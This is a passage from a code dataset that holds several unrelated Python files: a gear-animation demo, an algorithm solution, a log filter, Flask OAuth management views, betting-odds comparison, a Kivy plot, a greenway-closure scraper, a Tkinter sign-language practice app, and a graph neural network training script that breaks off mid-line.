5)\n spectral_clustering.fit(data)\n label = spectral_clustering.predict(data)\n\n","sub_path":"Lecture3/Point Cloud Homework III/Spectralclustering.py","file_name":"Spectralclustering.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353285434","text":"import cvzone\nimport cv2\nimport numpy as np\n\nangle = 0\nfpsReader = cvzone.FPS()\n\n\ndef empty(a):\n pass\n\n\ncv2.namedWindow(\"Parameters\")\ncv2.resizeWindow(\"Parameters\", 640, 100)\ncv2.createTrackbar(\"Speed\", \"Parameters\", 1, 25, empty)\n\nwhile True:\n imgBack = np.ones((500, 800, 3), np.uint8) * 255\n imgG1 = cv2.imread(\"Resources/gear.png\", cv2.IMREAD_UNCHANGED)\n imgG2 = imgG1.copy()\n\n val = cv2.getTrackbarPos(\"Speed\", \"Parameters\")\n imgG1 = cvzone.rotateImage(imgG1, angle + 23)\n imgG2 = cvzone.rotateImage(imgG2, -angle)\n angle += val\n\n imgResult = cvzone.overlayPNG(imgBack, imgG1, [125, 100])\n imgResult = cvzone.overlayPNG(imgResult, imgG2, [400, 100])\n _, imgResult = fpsReader.update(imgResult)\n\n cv2.imshow(\"Image\", imgResult)\n cv2.waitKey(1)\n","sub_path":"GearRotation.py","file_name":"GearRotation.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234393298","text":"def solution(cap, n, deliveries, pickups):\n answer = 0\n\n deli_cnt = 0\n pick_cnt = 0\n\n for i in range(n-1, -1, -1):\n deli_cnt += deliveries[i]\n pick_cnt += pickups[i]\n\n while deli_cnt > 0 or pick_cnt > 0:\n deli_cnt -= cap\n pick_cnt -= cap\n answer += (i+1) * 2\n\n return answer","sub_path":"Algorithm/programmers/택배 배달과 수거하기.py","file_name":"택배 배달과 수거하기.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270181989","text":"import sys\nimport os\nimport copy\n\ntry:\n from config import Config\n from filter import Filter\nexcept ImportError:\n from unlog.config import Config\n from unlog.filter import Filter\n\n\nclass Unlog:\n \"\"\"Filter the output of a command or a log file according to pattern passed\n in the *args* argument or according to a config file.\n \"\"\"\n\n def __init__(self, args):\n \"\"\" **PARAMETERS**\n\n * *args* - an ArgumentParser object containing all the option. Look at\n :py:mod:`unlog.main` for the list of opitons.\n \"\"\"\n self._args = args\n self._check_args()\n if args.start_pattern:\n self._filter_from_args()\n else:\n self._filter_from_config()\n\n def _check_args(self):\n \"\"\"Verify that the arguments are coherent. Exit with error code 2 if\n incoherences are fonud.\n \"\"\"\n if not self._args.files and not self._args.start_pattern \\\n and not self._args.use_config_section:\n sys.stderr.write('You must give a file or a start pattern.\\n')\n sys.exit(2)\n if (self._args.start_group_pattern and not self._args.end_group_pattern)\\\n or (not self._args.start_group_pattern and self._args.end_group_pattern):\n sys.stderr.write('You must --start-group and --end-group.')\n sys.exit(2)\n\n def _filter_from_args(self):\n \"\"\"Filter the files or stdin according to the patterns give by the\n arguments provided on the command line.\n \"\"\"\n config = copy.copy(self._args.__dict__)\n # Must not be passed to filter (unuseful)\n del config['files']\n # The following key are only used when processing from a config file\n del config['config_file']\n del config['use_config_section']\n # The filter manipulates string in the proper encoding. No need to pass it.\n del config['log_encoding']\n self._output_filter = Filter(**config)\n # If no files are provided, read from stdin\n if self._args.files:\n self._files = self._args.files\n self.process_files()\n else:\n self.process_stdin()\n\n def process_files(self):\n \"\"\"Loop on each file given on the command line and process them.\n \"\"\"\n for file in self._files:\n self.process_file(file, log_encoding=self._args.log_encoding)\n\n def process_file(self, file_name, log_encoding='utf-8'):\n \"\"\"Open file_name and process it with :py:meth:`unlog.filter.Filter.process_file`\n \"\"\"\n try:\n with open(file_name, 'r', encoding=log_encoding) as file:\n self._output_filter.process_file(file)\n except IOError as e:\n sys.stderr.write(str(e))\n sys.stderr.write(\"\\n\")\n\n def process_stdin(self):\n \"\"\"Process each line on the stdin with\n :py:meth:`unlog.filter.Filter.process_line`\n \"\"\"\n for line in iter(sys.stdin.readline, ''):\n self._output_filter.process_line(line)\n # We must print the stack when we reach the last line of stdin so that the\n # errors located at the end are displayed.\n self._output_filter.print_stack()\n self._output_filter.send_mail()\n\n def _filter_from_config(self):\n \"\"\"Filter the files according to the patterns defined in the\n configuration file.\n \"\"\"\n self._config = Config(self._args)\n if self._args.files:\n self.process_files_from_config()\n else:\n self._output_filter = self._config.get_filter()\n self.process_stdin()\n\n def process_files_from_config(self):\n \"\"\"Loop over each file given on the command line and process them\n according to the actions defined in the associated config file. The file\n is then passed to :py:meth:`process_file_filter_from_config`.\n \"\"\"\n for file_name in self._args.files:\n file_name = self._correct_path_input_file(file_name)\n self.process_file_filter_from_config(file_name)\n\n def _correct_path_input_file(self, file_name):\n \"\"\"Expand the ~ variable and transform a relative path into an absolute\n one.\n \"\"\"\n file_name = os.path.expanduser(file_name)\n file_name = os.path.abspath(file_name)\n return file_name\n\n def process_file_filter_from_config(self, file_name):\n \"\"\"Process the file_name with the filters defined in config with\n :py:meth:`process_file`.\n \"\"\"\n self._output_filter = self._config.get_filter(file_name)\n if self._output_filter:\n if 'encoding' in self._config:\n self.process_file(file_name, log_encoding=self._config['encoding'])\n else:\n self.process_file(file_name)\n","sub_path":"unlog/unlog.py","file_name":"unlog.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614608908","text":"# -*- coding: utf-8 -*-\n\"\"\"\n flask-sentinel.views\n ~~~~~~~~~~~~~~~~~~~~\n\n :copyright: (c) 2015 by Nicola Iarocci.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nimport os\nfrom flask import render_template, request, flash\n\nfrom .core import oauth\nfrom .data import Storage\nfrom .basicauth import requires_basicauth\nfrom .mail import send_email\n\n\n@oauth.token_handler\ndef access_token(*args, **kwargs):\n \"\"\" This endpoint is for exchanging/refreshing an access token.\n\n Returns a dictionary or None as the extra credentials for creating the\n token response.\n\n :param *args: Variable length argument list.\n :param **kwargs: Arbitrary keyword arguments.\n \"\"\"\n return None\n\n\n@requires_basicauth\ndef management():\n \"\"\" This endpoint is for vieweing and adding users and clients. \"\"\"\n error = None\n if request.method == 'POST' and request.form['submit'] == 'Add User':\n email = request.form['email']\n result = Storage.save_user(request.form['username'],\n request.form['password'],\n email)\n if result['status'] == 'success':\n message = {\n 'auto_html': None,\n 'auto_text': None,\n 'from_email': os.getenv('FROM_EMAIL') or 'from@example.com',\n 'from_name': os.getenv('FROM_NAME') or 'Example Name',\n 'html': '

Example HTML content

',\n 'subject': 'Your Account is created!',\n 'tags': ['user-registration'],\n 'to': [{'email': email,\n 'type': 'to'}],\n 'track_clicks': True,\n 'track_opens': True}\n send_email(message)\n else:\n error = result['message']\n if request.method == 'POST' and request.form['submit'] == 'Add Client':\n Storage.generate_client()\n error = None\n return render_template('management.html', users=Storage.all_users(),\n clients=Storage.all_clients(), error=error)\n","sub_path":"flask_sentinel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11689494","text":"import pandas as pd\nfrom itertools import zip_longest\nfrom supp_funcs import flatten, first_elem, first_elements, sure_bet\n\nclass Manipulator:\n def __init__(self, dfs, names_list):\n self.bets_names = names_list\n self.dfs_f = [tup[0] for tup in dfs]\n self.dfs_m = [tup[1] for tup in dfs]\n self.siblings = self.solitary_remove()\n self.unificated = self.unification()\n self.profitabilited = self.profitability()\n\n def solitary_remove(self):\n result = []\n for f_df, m_df, name in zip(self.dfs_f, self.dfs_m, self.bets_names):\n if f_df.empty or m_df.empty: continue\n result.append(((f_df, m_df), name))\n return result\n\n def unification(self):\n data_frames = self.siblings\n result = []\n for bets, name in data_frames: #pętla po typach zakladów\n fort = bets[0]\n mara = bets[1]\n\n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n \n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n longer_f_indexs_prices = sorted( ((idx.strip(), price) for idx, price in zip(f_index, f_data)), key=first_elem)\n longer_m_indexs_prices = sorted( filter(lambda x: not 'Brak opcji' in x[0],\n [(idx.strip(), price) for idx, price in zip(m_index, m_data)] ), key=first_elem )\n \n common = [row.strip() for row, _ in longer_f_indexs_prices if row.strip() in first_elements(longer_m_indexs_prices)]\n\n\n f_indexs_prices = dict( filter(lambda x: x[0] in common, longer_f_indexs_prices) )\n m_indexs_prices = dict( filter(lambda x: x[0] in common, longer_m_indexs_prices) )\n\n\n df_f =pd.DataFrame.from_dict(f_indexs_prices, orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(m_indexs_prices, orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name))\n \n return result\n \n def profitability(self):\n data_frames = self.unificated\n result = []\n sure_bet_names = ['GOLE',\n '1 DRUŻ. GOLE', '2 DRUŻ. GOLE', 'ŻÓŁTE KARTKI',\n '1.DRUŻ. ŻÓŁTE KARTKI', '2.DRUŻ. ŻÓŁTE KARTKI', '1.POŁ. ŻÓŁTE KARTKI',\n '1.DRUŻ 1.POŁ. ŻÓŁTE KARTKI', '2.DRUŻ 1.POŁ. ŻÓŁTE KARTKI', '2.POŁ. ŻÓŁTE KARTKI',\n '1.DRUŻ 2.POŁ. ŻÓŁTE KARTKI', '2.DRUŻ 2.POŁ. ŻÓŁTE KARTKI', 'ROŻNE',\n '1.DRUŻ. ROŻNE', '2.DRUŻ. ROŻNE', '1.POŁ. ROŻNE',\n '1.DRUŻ 1.POŁ. ROŻNE', '2.DRUŻ 1.POŁ. ROŻNE', '2.POŁ. ROŻNE',\n '1.DRUŻ 2.POŁ. ROŻNE', '2.DRUŻ 2.POŁ. ROŻNE']\n\n for bets, name in data_frames: #pętla po typach zakladów\n if name not in sure_bet_names:\n fort = bets[0]\n mara = bets[1]\n \n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n \n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n new_data_f, new_data_m = [], []\n for row_f, row_m in zip(f_data, m_data):\n new_row_f, new_row_m = [], [] \n\n for cell_f, cell_m in zip_longest(row_f, row_m, fillvalue='Brak kursu'):\n \n if cell_f == 'Brak kursu': \n new_cell_f = cell_f\n new_cell_m = cell_m\n \n elif cell_m == 'Brak kursu':\n new_cell_f = cell_f\n new_cell_m = cell_m \n \n else: \n new_cell_f = str(cell_f)+'*({})'.format(round(float(cell_f) / float(cell_m), 3)) if float(cell_f) / float(cell_m) > 1 else str(cell_f) \n new_cell_m = str(cell_m)+'*({})'.format(round(float(cell_f) / float(cell_m), 3)) if float(cell_f) / float(cell_m) > 1 else str(cell_m) \n\n new_row_f.append(new_cell_f)\n new_row_m.append(new_cell_m)\n\n new_data_f.append(new_row_f)\n new_data_m.append(new_row_m)\n\n if len(f_columns) != len(m_columns): \n if len(f_columns) < len(m_columns):\n f_columns.append(m_columns[-1])\n else:\n m_columns.append(f_columns[-1])\n df_f =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(f_index, new_data_f)), orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(m_index, new_data_m)), orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name)) \n\n else:\n fort = bets[0]\n mara = bets[1]\n \n f = fort.to_dict(orient='split')\n m = mara.to_dict(orient='split')\n \n f_index, f_columns, f_data = f['index'], f['columns'], f['data']\n m_index, m_columns, m_data = m['index'], m['columns'], m['data']\n\n new_data_f, new_data_m = [], []\n for row_f, row_m in zip(f_data, m_data):\n left_cell_f, right_cell_f = row_f\n left_cell_m, right_cell_m = row_m\n\n new_row_f, new_row_m = [], []\n\n if left_cell_f == 'Brak kursu' or right_cell_f == 'Brak kursu' or left_cell_m == 'Brak kursu' or right_cell_m == 'Brak kursu': \n new_left_cell_f = left_cell_f\n new_right_cell_f = right_cell_f\n new_left_cell_m = left_cell_m\n new_right_cell_m = right_cell_m\n \n else: \n new_left_cell_f = str(left_cell_f)+'**({})'.format(round(sure_bet(left_cell_f, right_cell_m), 3)) if float(left_cell_f) / float(left_cell_m) > 1 and sure_bet(left_cell_f, right_cell_m) > 0 else str(left_cell_f) \n new_right_cell_f = str(right_cell_f)+'**({})'.format(round(sure_bet(right_cell_f, left_cell_m), 3)) if float(right_cell_f) / float(right_cell_m) > 1 and sure_bet(right_cell_f, left_cell_m) > 0 else str(right_cell_f)\n new_left_cell_m = left_cell_m\n new_right_cell_m = right_cell_m\n \n new_row_f.append([new_left_cell_f, new_right_cell_f])\n new_row_m.append([new_left_cell_m, new_right_cell_m])\n\n new_data_f.append(new_row_f)\n new_data_m.append(new_row_m)\n\n if len(f_columns) != len(m_columns): \n if len(f_columns) < len(m_columns):\n f_columns.append(m_columns[-1])\n else:\n m_columns.append(f_columns[-1])\n\n \n df_f =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(f_index, flatten(new_data_f))), orient='index', columns=f_columns)\n df_m =pd.DataFrame.from_dict(dict((row, content) for row, content in zip_longest(m_index, flatten(new_data_m))), orient='index', columns=m_columns)\n\n result.append(((df_f, df_m), name))\n return result \n","sub_path":"preparer.py","file_name":"preparer.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207432568","text":"from kivy.lang import Builder\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.garden.graph import MeshLinePlot\nfrom kivy.clock import Clock\nfrom threading import Thread\nfrom math import sin\nfrom random import randint\nfrom collections import deque\nfrom time import sleep\n\n\ndef get_microphone_level():\n\tglobal levels\n\tglobal dq\n\tdq = deque()\n\twhile True:\n\t\tif len(dq) >= 100:\n\t\t\tdq.popleft()\n\t\tdq.append(randint(0,9))\n\t\tlevels = list(dq)\n\t\tsleep(0.01)\n\n\nclass Logic(BoxLayout):\n def __init__(self,):\n super(Logic, self).__init__()\n self.plot = MeshLinePlot(color=[1, 0, 0, 1])\n\n def start(self):\n self.ids.graph.add_plot(self.plot)\n Clock.schedule_interval(self.get_value, 0.01)\n\n def stop(self):\n Clock.unschedule(self.get_value)\n\n def get_value(self, dt):\n self.plot.points = [(i, j) for i, j in enumerate(levels)] \n\n\nclass RealTimeMicrophone(App):\n def build(self):\n return Builder.load_file(\"look.kv\")\n\nif __name__ == \"__main__\":\n levels = [] # store levels of microphone\n dq = [] # store levels of microphone\n get_level_thread = Thread(target = get_microphone_level)\n get_level_thread.daemon = True\n get_level_thread.start()\n RealTimeMicrophone().run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308653828","text":"# IMPORTS\nimport os\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport sqlite3\nfrom sqlite3 import Error\n\n# GLOBAL VARIABLES\n## Site URL\nurl = \"https://www.raleighnc.gov/parks/content/PRecDesignDevelop/Articles/GreenwayRepairs.html\"\n\n## Database\ncwd = os.getcwd()\ndb = \"{}/gw_closures.db\".format(cwd)\n\n## Get time of run\nrun_time = datetime.now()\nrun_id = int(run_time.strftime(\"%Y%m%d%H%M%S\"))\n\n# HELPER FUNCTIONS\n\n## Get the HTML for the Greenway closure page\ndef retrieve_gw_closure_html(url):\n r = requests.get(url)\n return BeautifulSoup(r.text, features='html5lib')\n\n## Create connection to database\ndef create_connection(db_file):\n try:\n connection = sqlite3.connect(db_file)\n return connection\n except Error as e:\n print(e)\n\n return None\n\n## Create new row in database table\ndef create_row(connection, sql, project):\n cursor = connection.cursor()\n cursor.execute(sql, project)\n\n# MAIN FUNCTION BODY\ndef main():\n # Retrieve the full site\n print(\"Retrieving HTML from the greenway closures page...\")\n try:\n full_site = retrieve_gw_closure_html(url)\n except Exception as e:\n print(e)\n finally:\n print(\"Success!\")\n\n # Gather all the divs with section class\n closures = full_site.find_all(\"div\", {\"class\": \"section\"})\n\n # Create a connection to the database\n connection = create_connection(db)\n\n # Add rows to closure table\n print(\"Adding rows to table \\'closure\\'\")\n for closure in closures:\n website_id = closure.find_all('h3')[0].get('id')\n name = closure.find_all(\"h3\")[0].text.replace(\"\\n\", \"\")\n description = closure.select(\".collapse\")[0].text.replace(\"\\n\", \"\")\n\n with connection:\n try:\n closure_sql = ''' INSERT INTO closure(run_id,website_id,name,description)\n VALUES(?,?,?,?) '''\n closure_project = (run_id, website_id, name, description)\n create_row(connection, closure_sql, closure_project)\n except Exception as e:\n print(e)\n print(\"Success!\")\n\n print(\"Adding rows to table \\'closure_links\\'\")\n # Add rows to links table\n for closure in closures:\n closure_info_list = []\n\n website_id = closure.find_all('h3')[0].get('id')\n name = closure.find_all(\"h3\")[0].text.replace(\"\\n\", \"\")\n description = closure.select(\".collapse\")[0].text.replace(\"\\n\", \"\")\n closure_links = closure.find_all(\"a\")\n for link in closure_links:\n href = link.get(\"href\")\n if href[0:4] != \"http\":\n if href[0] == \"/\":\n href = href[1:]\n closure_link = \"https://www.raleighnc.gov/{}\".format(href)\n else:\n closure_link = href\n\n with connection:\n try:\n closure_links_sql = ''' INSERT INTO closure_links(run_id,website_id,url)\n VALUES(?,?,?) '''\n closure_links_project = (run_id, website_id, closure_link)\n create_row(connection, closure_links_sql, closure_links_project)\n except Error as e:\n print(e)\n print(\"Success!\")\n\n print(\"Adding rows to table \\'closure_update\\'\")\n # Add row for run info\n ## Parse updated date header\n updated_date = full_site.find_all(\"div\", {\"class\": \"updatedDate\"})[0].text\n replacements = ((\"Last updated \", \"\"), (\".\", \"\"), (\",\", \"\"), (\"- \", \"\"))\n updated_date_clean = updated_date\n\n for r in replacements:\n updated_date_clean = updated_date_clean.replace(*r)\n updated_date_list = updated_date_clean.split()\n updated_date_datetime = datetime.strptime(updated_date_clean, \"%b %d %Y %I:%M %p\")\n updated_date_timestamp = updated_date_datetime.timestamp()\n\n ## Add row\n with connection:\n try:\n closure_update_sql = ''' INSERT INTO closure_update(run_id,updated)\n VALUES(?,?) '''\n closure_update_project = (run_id,int(updated_date_timestamp))\n create_row(connection, closure_update_sql, closure_update_project)\n except Error as e:\n print(e)\n print(\"Success!\")\n\n# MAIN FUNCTION CALL\nif __name__ == '__main__':\n main()\n","sub_path":"gw_closure_scraper.py","file_name":"gw_closure_scraper.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468111170","text":"import tkinter as tk\nfrom tkinter import font as tkfont\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom PIL import Image, ImageTk\nimport os\n\nclass PracticeApp(tk.Tk):\n\n\tdef __init__(self, *args, **kwargs):\n\t\ttk.Tk.__init__(self, *args, **kwargs)\n\n\t\tself.title_font = tkfont.Font(family='Helvetica', size=16)\n\t\tself.h1_font = tkfont.Font(family='Helvetica', size=16)\n\t\tself.body_font = tkfont.Font(family='Helvetica', size=12)\n\t\tself.geometry(\"1024x576\") #You want the size of the app to be 500x500\n\t\tself.resizable(0, 0) #Don't allow resizing in the x or y \n\t\t# the container is where we'll stack a bunch of frames\n\t\t# on top of each other, then the one we want visible\n\t\t# will be raised above the others\n\t\tself.wm_title(\"Fingerspelling - Practice Module\")\n\t\tcontainer = tk.Frame(self)\n\t\tcontainer.pack(side=\"top\", fill=\"both\", expand=True)\n\t\tcontainer.grid_rowconfigure(0, weight=1)\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\n\t\tself.frames = {}\n\t\tfor F in (StartPage, PageOne):\n\t\t\tpage_name = F.__name__\n\t\t\tframe = F(parent=container, controller=self)\n\t\t\tself.frames[page_name] = frame\n\n\t\t\t# put all of the pages in the same location;\n\t\t\t# the one on the top of the stacking order\n\t\t\t# will be the one that is visible.\n\t\t\tframe.grid(row=0, column=0, sticky=\"nsew\")\n\n\t\tself.show_frame(\"StartPage\")\n\n\tdef show_frame(self, page_name):\n\t\t'''Show a frame for the given page name'''\n\t\tframe = self.frames[page_name]\n\t\tframe.tkraise()\n\n\nclass StartPage(tk.Frame):\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\t\tself.controller = controller\n\t\t# create the canvas, size in pixels\n\t\t# background_image=tk.PhotoImage(\"web_parallax.jpg\")\n\t\t# background_label = tk.Label(self, image=background_image)\n\t\t# background_label.place(x=0, y=0, relwidth=1, relheight=1)\n\t\tload = Image.open(\"web_parallax.jpg\")\n\t\trender = ImageTk.PhotoImage(load)\n\n\t\t# labels can be text or images\n\t\timg = Label(self, image=render)\n\t\timg.image = render\n\t\timg.place(x=0, y=0)\n\t\ttitle_label = tk.Label(self, text=\"Fingerspelling - Indian Sign Language Training Tool\", font=controller.title_font)\n\t\ttitle_label.place(relx=.53, rely=.30, anchor=\"c\")\n\n\t\thead_label = tk.Label(self, text=\"Practice Indian Sign Language Gestures\", font=controller.h1_font)\n\t\thead_label.place(relx=.53, rely=.35, anchor=\"c\")\n\t\t\n\t\tinst_label = tk.Label(self, text=\"Start practicing your gestures today! \\nEnsure your primary webcam is working and room is well illuminated\", font=controller.body_font)\n\t\tinst_label.place(relx=.53, rely=.65, anchor=\"c\")\n\t\tbutton1 = tk.Button(self, text=\"►\", bg=\"#1eeeee\", fg=\"black\",command=lambda: controller.show_frame(\"PageOne\"), font=controller.h1_font)\n\t\t# button2 = tk.Button(self, text=\"Go to Page Two\",command=lambda: controller.show_frame(\"PageTwo\"))\n\t\tbutton1.place(relx=.9, rely=.8, anchor=\"c\")\n\t\t# button2.pack(side=\"top\", fill=\"x\", pady=10)\n\n\nclass PageOne(tk.Frame):\n\talphabets=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]\n\n\tdef __init__(self, parent, controller):\n\t\ttk.Frame.__init__(self, parent)\n\t\tself.controller = controller\n\t\t# create the canvas, size in pixels\n\t\tload = Image.open(\"web_parallax.jpg\")\n\t\trender = ImageTk.PhotoImage(load)\n\t\t# labels can be text or images\n\t\timg = Label(self, image=render)\n\t\timg.image = render\n\t\timg.place(x=0, y=0)\n\n\t\ttitle_label = tk.Label(self, text=\"Fingerspelling - Indian Sign Language Training Tool\", font=controller.title_font)\n\t\ttitle_label.place(relx=.53, rely=.30, anchor=\"c\")\n\n\t\tlabel = tk.Label(self, text=\"Click on the alphabet you want to practice \\nA new window will open where you will see the camera feed \\nPerform Gestures in front of the camera \\nSystem will show a rectangle in front of your hands when gesture is detected \\n Ensure Proper lighting condition\", font=controller.body_font)\n\t\tlabel.place(relx=.53, rely=.65, anchor=\"c\")\n\n\t\tback_button = tk.Button(self, text=\"Back\", bg=\"#1eeeee\", fg=\"black\",command=lambda: controller.show_frame(\"StartPage\"), font=controller.h1_font)\n\t\tback_button.place(relx=.1, rely=.95, anchor=\"c\")\n\n\t\tfor i in self.alphabets:\t\t\n\t\t\ta_button = tk.Button(self, text=chr(i+64), bg=\"#1eeeee\", font=controller.h1_font, fg=\"black\",command=lambda i=i: os.system(str(chr(i+64))+\".py\"), width=2)\n\t\t\tif i==1:\n\t\t\t\ta_button.grid(row=0,column=i, padx=(17,2.3),pady=450)\n\t\t\telse:\n\t\t\t\ta_button.grid(row=0,column=i, padx=2.3,pady=450)\n\n\nif __name__ == \"__main__\":\n\tapp = PracticeApp()\n\tapp.mainloop()","sub_path":"Practice module/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482574589","text":"from sklearn.metrics import roc_curve, roc_auc_score,accuracy_score,precision_score,recall_score,f1_score\nfrom tensorboardX import SummaryWriter\nimport os\nfrom args import *\nfrom model import *\nfrom utils import *\nfrom dataset import *\nimport time\nimport numpy as np\nimport torch\nif not os.path.isdir('results'):\n os.mkdir('results')\n# args\nargs = make_args()\nprint(args)\nnp.random.seed(123)\nnp.random.seed()\nwriter_train = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_train')\nwriter_val = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_val')\nwriter_test = SummaryWriter(comment=args.task+'_'+args.model+'_'+args.comment+'_test')\n\nprint(args.gpu)\n# set up gpu\nif args.gpu:\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.cuda)\n print('Using GPU {}'.format(os.environ['CUDA_VISIBLE_DEVICES']))\nelse:\n print('Using CPU')\ndevice = torch.device('cuda:'+str(args.cuda) if args.gpu else 'cpu')\n\n\nfor task in ['link', 'link_pair']:\n args.task = task\n if args.dataset=='All':\n if task == 'link':\n datasets_name = ['grid','communities','ppi']\n else:\n datasets_name = ['communities', 'email', 'protein']\n else:\n datasets_name = [args.dataset]\n for dataset_name in datasets_name:\n # if dataset_name in ['communities','grid']:\n # args.cache = False\n # else:\n # args.epoch_num = 401\n # args.cache = True\n results_auc,results_acc,results_prec,results_rec,results_f1 = [],[],[],[],[]\n for repeat in range(args.repeat_num):\n result_val = []\n result_auc,result_acc,result_prec,result_rec,result_f1 = [],[],[],[],[]\n time1 = time.time()\n data_list = get_tg_dataset(args, dataset_name, use_cache=args.cache, remove_feature=args.rm_feature)\n time2 = time.time()\n print(dataset_name, 'load time', time2-time1)\n\n num_features = data_list[0].x.shape[1]\n num_node_classes = None\n num_graph_classes = None\n if 'y' in data_list[0].__dict__ and data_list[0].y is not None:\n num_node_classes = max([data.y.max().item() for data in data_list])+1\n if 'y_graph' in data_list[0].__dict__ and data_list[0].y_graph is not None:\n num_graph_classes = max([data.y_graph.numpy()[0] for data in data_list])+1\n print('Dataset', dataset_name, 'Graph', len(data_list), 'Feature', num_features, 'Node Class', num_node_classes, 'Graph Class', num_graph_classes)\n nodes = [data.num_nodes for data in data_list]\n edges = [data.num_edges for data in data_list]\n print('Node: max{}, min{}, mean{}'.format(max(nodes), min(nodes), sum(nodes)/len(nodes)))\n print('Edge: max{}, min{}, mean{}'.format(max(edges), min(edges), sum(edges)/len(edges)))\n\n args.batch_size = min(args.batch_size, len(data_list))\n print('Anchor num {}, Batch size {}'.format(args.anchor_num, args.batch_size))\n\n # data\n for i,data in enumerate(data_list):\n preselect_anchor(data, layer_num=args.layer_num, anchor_num=args.anchor_num, device='cpu')\n data = data.to(device)\n data_list[i] = data\n\n # model\n input_dim = num_features\n output_dim = args.output_dim\n model = locals()[args.model](input_dim=input_dim, feature_dim=args.feature_dim,\n hidden_dim=args.hidden_dim, output_dim=output_dim,\n feature_pre=args.feature_pre, layer_num=args.layer_num, dropout=args.dropout,agg=args.agg).to(device)\n # loss\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=5e-4)\n if 'link' in args.task:\n loss_func = nn.BCEWithLogitsLoss()\n out_act = nn.Sigmoid()\n\n\n for epoch in range(args.epoch_num):\n if epoch==200:\n for param_group in optimizer.param_groups:\n param_group['lr'] /= 10\n model.train()\n optimizer.zero_grad()\n shuffle(data_list)\n effective_len = len(data_list)//args.batch_size*len(data_list)\n\n for id, data in enumerate(data_list[:effective_len]):\n if args.permute:\n preselect_anchor(data, layer_num=args.layer_num, anchor_num=args.anchor_num, device=device)\n print(\"Damn\",data.dists_max.shape)\n out = model(data)\n print(\"OUT \" ,out.shape)\n\n # get_link_mask(data,resplit=False) # resample negative links\n edge_mask_train = np.concatenate((data.mask_link_positive_train, data.mask_link_negative_train), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[0,:]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[1,:]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_train.shape[1],], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_train.shape[1],], dtype=pred.dtype)\n label = torch.cat((label_positive,label_negative)).to(device)\n print(nodes_first.shape,nodes_second.shape)\n loss = loss_func(pred, label)\n\n # update\n loss.backward()\n if id % args.batch_size == args.batch_size-1:\n if args.batch_size>1:\n # if this is slow, no need to do this normalization\n for p in model.parameters():\n if p.grad is not None:\n p.grad /= args.batch_size\n optimizer.step()\n optimizer.zero_grad()\n\n\n if epoch % args.epoch_log == 0:\n # evaluate\n model.eval()\n loss_train = 0\n loss_val = 0\n loss_test = 0\n correct_train = 0\n all_train = 0\n correct_val = 0\n all_val = 0\n correct_test = 0\n all_test = 0\n auc_train = 0\n auc_val = 0\n auc_test = 0\n emb_norm_min = 0\n emb_norm_max = 0\n emb_norm_mean = 0\n accuracy_train=0\n accuracy_val=0\n accuracy_test=0\n precision_train=0\n precision_val=0\n precision_test=0\n recall_train=0\n recall_val=0\n recall_test=0\n f1_train=0\n f1_val=0\n f1_test=0\n\n\n for id, data in enumerate(data_list):\n out = model(data)\n emb_norm_min += torch.norm(out.data, dim=1).min().cpu().numpy()\n emb_norm_max += torch.norm(out.data, dim=1).max().cpu().numpy()\n emb_norm_mean += torch.norm(out.data, dim=1).mean().cpu().numpy()\n\n # train\n # get_link_mask(data, resplit=False) # resample negative links\n edge_mask_train = np.concatenate((data.mask_link_positive_train, data.mask_link_negative_train), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[0, 